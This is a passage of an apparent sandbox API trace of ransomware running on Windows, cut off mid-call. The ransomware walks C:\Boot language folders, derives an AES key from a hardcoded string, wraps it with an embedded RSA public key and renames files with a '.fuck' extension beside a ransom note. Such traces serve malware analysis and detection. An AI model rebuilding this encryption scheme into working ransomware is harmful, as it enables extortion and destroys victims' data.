[0231.341] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.341] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.341] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.341] GetLastError () returned 0x12 [0231.342] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0231.342] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.342] CreateFileA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.342] CreateFileA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.342] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.343] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275bcf8) returned 1 [0231.345] CryptCreateHash (in: hProv=0x275bcf8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.345] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.345] CryptHashData (hHash=0x394a68, pbData=0x2ec760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.345] CryptDeriveKey (in: hProv=0x275bcf8, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.345] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.345] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.345] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275be08) returned 1 [0231.346] CryptImportPublicKeyInfo (in: hCryptProv=0x275be08, dwCertEncodingType=0x1, pInfo=0x27605f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760620*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760628*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3940a8) returned 1 [0231.346] CryptEncrypt (in: hKey=0x3940a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.346] CryptEncrypt (in: hKey=0x3940a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275b478*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275b478*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.346] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275b478, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.346] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2766bd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2766bd0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.346] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2766bd0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2766bd0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.346] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2766bd0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.346] CloseHandle (hObject=0xffffffff) returned 1 [0231.346] CloseHandle (hObject=0xffffffff) returned 1 [0231.346] CopyFileA (lpExistingFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.346] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.347] DeleteFileA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.gsg")) returned 0 [0231.347] MoveFileA (lpExistingFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.fuck")) returned 0 [0231.347] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.347] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.347] CryptReleaseContext (hProv=0x275bcf8, dwFlags=0x0) returned 1 [0231.347] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.347] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.348] GetLastError () returned 0x5 [0231.348] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui")) returned 0x20 [0231.348] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.348] CreateFileA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.348] CreateFileA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.348] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.349] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b610) returned 1 [0231.351] CryptCreateHash (in: hProv=0x275b610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.351] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.351] CryptHashData (hHash=0x394d28, pbData=0x2ec6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.351] CryptDeriveKey (in: hProv=0x275b610, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.351] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.351] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.351] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b500) returned 1 [0231.352] CryptImportPublicKeyInfo (in: hCryptProv=0x275b500, dwCertEncodingType=0x1, pInfo=0x27601e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760210*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760218*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3943a8) returned 1 [0231.352] CryptEncrypt (in: hKey=0x3943a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.352] CryptEncrypt (in: hKey=0x3943a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275bcf8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275bcf8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.352] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275bcf8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.352] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27680b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27680b8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.352] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27680b8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27680b8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.352] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27680b8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.352] CloseHandle (hObject=0xffffffff) returned 1 [0231.352] CloseHandle (hObject=0xffffffff) returned 1 [0231.352] CopyFileA (lpExistingFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.353] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.353] DeleteFileA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.gsg")) returned 0 [0231.353] MoveFileA (lpExistingFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.fuck")) returned 0 [0231.353] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.353] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.353] CryptReleaseContext (hProv=0x275b610, dwFlags=0x0) returned 1 [0231.353] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.353] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.354] FindClose (in: hFindFile=0x3949a8 | out: hFindFile=0x3949a8) returned 1 [0231.354] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\README_BACK_FILES.htm" (normalized: "c:\\boot\\es-es\\readme_back_files.htm")) returned 0x20 [0231.354] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.354] FindFirstFileA (in: lpFileName="C:\\\\Boot\\es-MX\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x394be8 [0231.355] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.355] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.355] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.355] GetLastError () returned 0x12 [0231.355] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui")) returned 0x20 [0231.355] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.355] CreateFileA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.356] CreateFileA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.356] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.356] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b038) returned 1 [0231.358] CryptCreateHash (in: hProv=0x275b038, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.358] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.358] CryptHashData (hHash=0x394a68, pbData=0x2ecaa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.358] CryptDeriveKey (in: hProv=0x275b038, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.358] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.358] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.359] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b0c0) returned 1 [0231.359] CryptImportPublicKeyInfo (in: hCryptProv=0x275b0c0, dwCertEncodingType=0x1, pInfo=0x2760930*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760960*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760968*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3943e8) returned 1 [0231.359] CryptEncrypt (in: hKey=0x3943e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.359] CryptEncrypt (in: hKey=0x3943e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275be90*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275be90*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.359] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275be90, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.359] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276a0c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276a0c8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.359] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276a0c8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276a0c8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.360] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276a0c8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.360] CloseHandle (hObject=0xffffffff) returned 1 [0231.360] CloseHandle (hObject=0xffffffff) returned 1 [0231.360] CopyFileA (lpExistingFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.360] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.360] DeleteFileA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.gsg")) returned 0 [0231.361] MoveFileA (lpExistingFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.fuck")) returned 0 [0231.361] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.361] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.361] CryptReleaseContext (hProv=0x275b038, dwFlags=0x0) returned 1 [0231.361] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.361] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.361] FindClose (in: hFindFile=0x394be8 | out: hFindFile=0x394be8) returned 1 [0231.361] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\README_BACK_FILES.htm" (normalized: "c:\\boot\\es-mx\\readme_back_files.htm")) returned 0x20 [0231.361] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.362] FindFirstFileA (in: lpFileName="C:\\\\Boot\\et-EE\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x3949a8 [0231.362] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.362] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.362] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.362] GetLastError () returned 0x12 [0231.362] GetFileAttributesA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui")) returned 0x20 [0231.362] SetFileAttributesA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.362] CreateFileA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.363] CreateFileA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.363] SetFileAttributesA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.363] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b610) returned 1 [0231.365] CryptCreateHash (in: hProv=0x275b610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.365] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.365] CryptHashData (hHash=0x394d28, pbData=0x2ec8a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.365] CryptDeriveKey (in: hProv=0x275b610, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.366] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.366] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.366] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b720) returned 1 [0231.366] CryptImportPublicKeyInfo (in: hCryptProv=0x275b720, dwCertEncodingType=0x1, pInfo=0x275f8f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275f920*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275f928*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3941e8) returned 1 [0231.366] CryptEncrypt (in: hKey=0x3941e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.366] CryptEncrypt (in: hKey=0x3941e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275bf18*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275bf18*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.367] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275bf18, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.367] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276c298, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276c298, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.367] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276c298*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276c298*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.367] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276c298, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.367] CloseHandle (hObject=0xffffffff) returned 1 [0231.367] CloseHandle (hObject=0xffffffff) returned 1 [0231.367] CopyFileA (lpExistingFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.368] SetFileAttributesA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.368] DeleteFileA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.gsg")) returned 0 [0231.368] MoveFileA 